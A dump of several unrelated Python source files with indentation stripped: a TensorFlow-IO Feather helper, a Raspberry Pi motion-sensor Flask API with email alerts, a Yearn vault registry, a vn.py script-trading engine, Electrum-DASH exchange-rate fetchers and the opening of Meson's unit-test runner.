# Pandas will produce a partial batch if there is a remainder
for i in range(0, len(df), batch_size):
df_slice = df[i : i + batch_size]
batch = pa.RecordBatch.from_pandas(
df_slice, preserve_index=preserve_index
)
yield batch
# Not batching, convert entire DataFrame to one record batch
else:
batch = pa.RecordBatch.from_pandas(
df, preserve_index=preserve_index
)
yield batch
# Get first batch to convert schema to output types and shapes
record_batch_iter = gen_record_batches()
batch = next(record_batch_iter)
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
chain([batch], record_batch_iter),
output_types,
output_shapes,
batch_size=batch_size,
batch_mode="keep_remainder",
record_batch_iter_factory=gen_record_batches,
)
def list_feather_columns(filename, **kwargs):
"""list_feather_columns"""
if not tf.executing_eagerly():
raise NotImplementedError("list_feather_columns only support eager mode")
memory = kwargs.get("memory", "")
columns, dtypes_, shapes = core_ops.io_list_feather_columns(filename, memory=memory)
entries = zip(tf.unstack(columns), tf.unstack(dtypes_), tf.unstack(shapes))
return {
column.numpy().decode(): tf.TensorSpec(
shape.numpy(), dtype.numpy().decode(), column.numpy().decode()
)
for (column, dtype, shape) in entries
}
|
pir-api.py
|
from flask import Flask, jsonify, g
from flask_cors import CORS
import RPi.GPIO as GPIO
import sys, ctypes, os, logging
from time import gmtime, localtime, strftime, sleep
from datetime import datetime, timedelta
import sqlite3
from multiprocessing import Process, Queue
from dotenv import load_dotenv
import smtplib
from email.mime.text import MIMEText
# flush all out and load .env file
sys.stdout.flush()
load_dotenv()
DATABASE = '/home/pi/pir-api.db'
GPIO_LED = 24 # Pin 18
GPIO_PIR = 27 # Pin 13
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(GPIO_LED, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(GPIO_PIR, GPIO.IN)
PIR_TIMEOUT = 5*60 # 5 mins
app = Flask(__name__)
CORS(app)
q = Queue()
if __name__ != '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def init_db():
with app.app_context():
db = get_db()
with app.open_resource('./schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def replace_db(table, fields=(), values=()):
db = get_db()
cur = db.cursor()
query = 'REPLACE INTO %s (%s) VALUES (%s)' % (
table,
', '.join(fields),
', '.join(['?'] * len(values))
)
cur.execute(query, values)
db.commit()
id = cur.lastrowid
cur.close()
return id
def update_last():
now = datetime.now()
lastT = now.strftime('%H:%M')
lastD = now.strftime('%Y-%m-%d')
with app.app_context():
replace_db('_last', ['id', 'lastD', 'lastT'], [1, lastD, lastT])
def get_last():
last = query_db("SELECT lastT, lastD FROM _last WHERE id = 1", one=True)
lastT, lastD = last
mins = int(os.getenv('ALERT_AFTER_MINS'))
alert_hm = "%02d:%02d" % (mins/60, mins%60)
now = datetime.now()
active = get_active(now)
app.logger.debug('Last: %s %s, timeout: %s' % (lastD, lastT, alert_hm))
return {
'date': lastD,
'time': lastT,
'timeout': alert_hm, # in hours abd mins
'active': str(active) # active state
}
def h_index(h):
if (h >= 6 and h < 9):
return 0
elif (h >= 9 and h < 12):
return 1
elif (h >= 12 and h < 15):
return 2
elif (h >= 15 and h < 18):
return 3
elif (h >= 18 and h < 21):
return 4
return -1
def clear_motions(lastIndex):
index = h_index(int(datetime.now().strftime('%H')))
if index == lastIndex:
return index
with app.app_context():
motions = get_motions()
motions[index] = 0
app.logger.debug('Clear motions: %s' % motions[0:5])
with app.app_context():
replace_db('_motions', ['id', 'motions'], [1, ','.join([str(i) for i in motions])])
return index
def update_motions():
index = h_index(int(datetime.now().strftime('%H')))
with app.app_context():
motions = get_motions()
if index >= 0:
motions[index] += 1
with app.app_context():
replace_db('_motions', ['id', 'motions'], [1, ','.join([str(i) for i in motions])])
app.logger.debug('Update motions: %s' % motions[0:5])
def get_motions():
motions = query_db("SELECT motions FROM _motions WHERE id = 1", one=True)
if motions == None:
motions = [0, 0, 0, 0, 0, 0]
else:
motions = list(map(int, motions[0].split(',')))
return motions
def send_email(to, subject, body):
SMTP_SERVER = os.getenv('SMTP_SERVER')
SMTP_LOGIN = os.getenv('SMTP_LOGIN')
SMTP_PASSWD = os.getenv('SMTP_PASSWD')
server = smtplib.SMTP(SMTP_SERVER, 587)
server.ehlo()
server.starttls()
server.ehlo()
# Next, log in to the server
server.login(SMTP_LOGIN, SMTP_PASSWD)
msg = MIMEText(body)
msg['From'] = 'noreply@' + SMTP_SERVER
msg['To'] = to
msg['Subject'] = subject
# Send the mail
server.send_message(msg)
server.quit()
def pir_callback(channel):
q.put(datetime.now())
def get_uptime():
uptimes = os.getenv('UPTIME').split('-')
_from = uptimes[0].split(':')
_to = uptimes[1].split(':')
return list(map(int, _from)) + list( map(int, _to))
def get_active(now):
fromH, fromM, toH, toM = get_uptime()
_from = now.replace(hour=fromH, minute=fromM, second=0)
_to = now.replace(hour=toH, minute=toM, second=0)
return True if now > _from and now < _to else False
def pir_loop(q):
lastTrigger, lastIndex, cnt = datetime(1970, 1, 1), 0, 0
warn_sent, alert_sent = True, True
GPIO.add_event_detect(GPIO_PIR, GPIO.RISING)
GPIO.add_event_callback(GPIO_PIR, pir_callback)
alert_delay = int(os.getenv('ALERT_AFTER_MINS')) * 60
warn_delay = int(os.getenv('WARN_AFTER_MINS')) * 60
app.logger.info("New thread waiting for PIR motions")
while True:
if not q.empty():
# a motion was detected
trigger = q.get()
# obey motion timeout
if lastTrigger + timedelta(0, PIR_TIMEOUT) < trigger:
app.logger.debug("** New motion detected and registered")
update_last()
update_motions()
lastTrigger = trigger
warn_sent, alert_sent = False, False
else:
# motion detected but not registered
app.logger.debug("New motion detected but not registered")
else:
now = datetime.now()
# reset motions counter when in new duration segment
lastIndex = clear_motions(lastIndex)
active = get_active(now)
if active:
if not warn_sent and (lastTrigger + timedelta(0, warn_delay) < now):
warn_emails = os.getenv('WARN_EMAILS_TO').split(',')
app.logger.info("Send Warn E-Mails to %s" % warn_emails)
for email in warn_emails:
send_email(email, "MoMo-Warning",
os.getenv('WARN_EMAIL_BODY'))
warn_sent = True
if not alert_sent and (lastTrigger + timedelta(0, alert_delay) < now):
alert_emails = os.getenv('ALERT_EMAILS_TO').split(',')
app.logger.info("Send Alert E-Mails to %s" % alert_emails)
for email in alert_emails:
send_email(email, "MoMo-Alert",
os.getenv('ALERT_EMAIL_BODY'))
alert_sent = True
if not (cnt % 12):
app.logger.debug("PIR loop still is executing (%06dm - %sactive)" %
(cnt/12, "not " if not active else ""))
sys.stdout.flush()
cnt += 1
sleep(5)
@app.route('/pir/api/v1/last')
def last():
GPIO.output(GPIO_LED, GPIO.HIGH)
return jsonify(get_last())
@app.route('/pir/api/v1/hourly')
def hourly():
GPIO.output(GPIO_LED, GPIO.LOW)
try:
# Initialize a list of hourly motions
motionList = []
motions = get_motions()
app.logger.debug('Get motions: %s' % motions[0:5])
# create a instances for filling up employee list
for i in range(0, 6):
motionDict = {
'hour': str(i * 3 + 6),
'count': str(motions[i] if i<5 else '0')
}
motionList.append(motionDict)
except Exception as e:
print(e.message, e.args)
return jsonify(motionList)
def main():
init_db()
# start with current date and time
update_last()
app.logger.info("Start PIR server.")
p = Process(target=pir_loop, args=(q, ))
p.start()
# execute only if we do not use gunicorn
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000, debug=True)
p.join()
main()
|
registry.py
|
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import Singleton, contract_creation_block, contract
from yearn.v2.vaults import Vault
from yearn.networks import Network
from yearn.exceptions import UnsupportedNetwork
from yearn.decorators import sentry_catch_all, wait_or_exit_before, wait_or_exit_after
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self, watch_events_forever=True, include_experimental=True):
self.releases = {} # api_version => template
self._vaults = {} # address -> Vault
self._experiments = {} # address => Vault
self.governance = None
self.tags = {}
self._watch_events_forever = watch_events_forever
self.include_experimental = include_experimental
self.registries = self.load_registry()
# load registry state in the background
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_registry(self):
if chain.id == Network.Mainnet:
return self.load_from_ens()
elif chain.id == Network.Gnosis:
return [contract('0xe2F12ebBa58CAf63fcFc0e8ab5A61b145bBA3462')]
elif chain.id == Network.Fantom:
return [contract('0x727fe1759430df13655ddb0731dE0D0FDE929b04')]
elif chain.id == Network.Arbitrum:
return [contract('0x3199437193625DCcD6F9C9e98BDf93582200Eb1f')]
else:
raise UnsupportedNetwork('yearn v2 is not available on this network')
def load_from_ens(self):
# track older registries to pull experiments
resolver = contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
@wait_or_exit_before
def vaults(self) -> List[Vault]:
return list(self._vaults.values())
@property
@wait_or_exit_before
def experiments(self) -> List[Vault]:
return list(self._experiments.values())
@wait_or_exit_before
def __repr__(self) -> str:
return f"<Registry chain={chain.id} releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
@wait_or_exit_after
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
logs = self.log_filter.get_all_entries()
while True:
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
# read new logs at end of loop
logs = self.log_filter.get_new_entries()
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if self.include_experimental and event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
watch_events_forever=self._watch_events_forever,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.active_vaults_at(block)
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
def wallets(self, block=None):
return set(vault.wallets(block) for vault in self.active_vaults_at(block))
|
engine.py
|
import sys
import importlib
import traceback
from typing import Optional, Sequence, Any, List
from pathlib import Path
from datetime import datetime
from threading import Thread
from pandas import DataFrame
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.constant import Direction, Offset, OrderType, Interval
from vnpy.trader.object import (
BaseData,
OrderRequest,
HistoryRequest,
SubscribeRequest,
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
LogData,
BarData,
CancelRequest
)
from vnpy.trader.datafeed import BaseDatafeed, get_datafeed
APP_NAME: str = "ScriptTrader"
EVENT_SCRIPT_LOG: str = "eScriptLog"
class ScriptEngine(BaseEngine):
""""""
setting_filename: str = "script_trader_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.strategy_active: bool = False
self.strategy_thread: Thread = None
self.datafeed: BaseDatafeed = get_datafeed()
def init(self) -> None:
"""启动策略引擎"""
result: bool = self.datafeed.init()
if result:
self.write_log("数据服务初始化成功")
def start_strategy(self, script_path: str) -> None:
"""运行策略线程中的策略方法"""
if self.strategy_active:
return
self.strategy_active: bool = True
self.strategy_thread: Thread = Thread(
target=self.run_strategy, args=(script_path,))
self.strategy_thread.start()
self.write_log("策略交易脚本启动")
def run_strategy(self, script_path: str) -> None:
"""加载策略脚本并调用run函数"""
path: Path = Path(script_path)
sys.path.append(str(path.parent))
script_name: str = path.parts[-1]
module_name: str = script_name.replace(".py", "")
try:
module = importlib.import_module(module_name)
importlib.reload(module)
module.run(self)
except Exception:
msg: str = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg)
def stop_strategy(self) -> None:
"""停止运行中的策略"""
if not self.strategy_active:
return
self.strategy_active: bool = False
if self.strategy_thread:
self.strategy_thread.join()
self.strategy_thread: Thread = None
self.write_log("策略交易脚本停止")
def connect_gateway(self, setting: dict, gateway_name: str) -> None:
""""""
self.main_engine.connect(setting, gateway_name)
def send_order(
self,
vt_symbol: str,
price: float,
volume: float,
direction: Direction,
offset: Offset,
order_type: OrderType
) -> str:
""""""
contract: Optional[ContractData] = self.get_contract(vt_symbol)
if not contract:
return ""
req: OrderRequest = OrderRequest(
symbol=contract.symbol,
exchange=contract.exchange,
direction=direction,
type=order_type,
volume=volume,
price=price,
offset=offset,
reference=APP_NAME
)
vt_orderid: str = self.main_engine.send_order(req, contract.gateway_name)
return vt_orderid
def subscribe(self, vt_symbols) -> None:
""""""
for vt_symbol in vt_symbols:
contract: Optional[ContractData] = self.main_engine.get_contract(vt_symbol)
if contract:
req: SubscribeRequest = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
def buy(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.LONG, Offset.OPEN, order_type)
def sell(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.SHORT, Offset.CLOSE, order_type)
def short(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.SHORT, Offset.OPEN, order_type)
def cover(
self,
vt_symbol: str,
price: float,
volume: float,
order_type: OrderType = OrderType.LIMIT
) -> str:
""""""
return self.send_order(vt_symbol, price, volume, Direction.LONG, Offset.CLOSE, order_type)
def cancel_order(self, vt_orderid: str) -> None:
""""""
order: Optional[OrderData] = self.get_order(vt_orderid)
if not order:
return
req: CancelRequest = order.create_cancel_request()
self.main_engine.cancel_order(req, order.gateway_name)
def get_tick(self, vt_symbol: str, use_df: bool = False) -> TickData:
""""""
return get_data(self.main_engine.get_tick, arg=vt_symbol, use_df=use_df)
def get_ticks(self, vt_symbols: Sequence[str], use_df: bool = False) -> Sequence[TickData]:
""""""
ticks: list = []
for vt_symbol in vt_symbols:
tick: TickData = self.main_engine.get_tick(vt_symbol)
ticks.append(tick)
if not use_df:
return ticks
else:
return to_df(ticks)
def get_order(self, vt_orderid: str, use_df: bool = False) -> OrderData:
""""""
return get_data(self.main_engine.get_order, arg=vt_orderid, use_df=use_df)
def get_orders(self, vt_orderids: Sequence[str], use_df: bool = False) -> Sequence[OrderData]:
""""""
orders: list = []
for vt_orderid in vt_orderids:
order: OrderData = self.main_engine.get_order(vt_orderid)
orders.append(order)
if not use_df:
return orders
else:
return to_df(orders)
def get_trades(self, vt_orderid: str, use_df: bool = False) -> Sequence[TradeData]:
""""""
trades: list = []
all_trades: List[TradeData] = self.main_engine.get_all_trades()
for trade in all_trades:
if trade.vt_orderid == vt_orderid:
trades.append(trade)
if not use_df:
return trades
else:
return to_df(trades)
def get_all_active_orders(self, use_df: bool = False) -> Sequence[OrderData]:
""""""
return get_data(self.main_engine.get_all_active_orders, use_df=use_df)
def get_contract(self, vt_symbol, use_df: bool = False) -> ContractData:
""""""
return get_data(self.main_engine.get_contract, arg=vt_symbol, use_df=use_df)
def get_all_contracts(self, use_df: bool = False) -> Sequence[ContractData]:
""""""
return get_data(self.main_engine.get_all_contracts, use_df=use_df)
def get_account(self, vt_accountid: str, use_df: bool = False) -> AccountData:
""""""
return get_data(self.main_engine.get_account, arg=vt_accountid, use_df=use_df)
def get_all_accounts(self, use_df: bool = False) -> Sequence[AccountData]:
""""""
return get_data(self.main_engine.get_all_accounts, use_df=use_df)
def get_position(self, vt_positionid: str, use_df: bool = False) -> PositionData:
""""""
return get_data(self.main_engine.get_position, arg=vt_positionid, use_df=use_df)
def get_all_positions(self, use_df: bool = False) -> Sequence[PositionData]:
""""""
return get_data(self.main_engine.get_all_positions, use_df=use_df)
def get_bars(
self,
vt_symbol: str,
start_date: str,
interval: Interval,
use_df: bool = False
) -> Sequence[BarData]:
""""""
contract: Optional[ContractData] = self.main_engine.get_contract(vt_symbol)
if not contract:
return []
start: datetime = datetime.strptime(start_date, "%Y%m%d")
end: datetime = datetime.now()
req: HistoryRequest = HistoryRequest(
symbol=contract.symbol,
exchange=contract.exchange,
start=start,
end=end,
interval=interval
)
return get_data(self.datafeed.query_bar_history, arg=req, use_df=use_df)
def write_log(self, msg: str) -> None:
""""""
log: LogData = LogData(msg=msg, gateway_name=APP_NAME)
print(f"{log.time}\t{log.msg}")
event: Event = Event(EVENT_SCRIPT_LOG, log)
self.event_engine.put(event)
def send_email(self, msg: str) -> None:
""""""
subject: str = "脚本策略引擎通知"
self.main_engine.send_email(subject, msg)
def to_df(data_list: Sequence) -> Optional[DataFrame]:
""""""
if not data_list:
return None
dict_list: list = [data.__dict__ for data in data_list]
return DataFrame(dict_list)
def get_data(func: callable, arg: Any = None, use_df: bool = False) -> BaseData:
""""""
if not arg:
data = func()
else:
data = func(arg)
if not use_df:
return data
elif data is None:
return data
else:
if not isinstance(data, list):
data = [data]
return to_df(data)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'Bittrex'
DEFAULT_CCY = 'BTC'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-DASH'
})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-DASH'
})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-DASH')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
dash_ticker = json.get('BTC_DASH')
quote_currencies['BTC'] = Decimal(dash_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
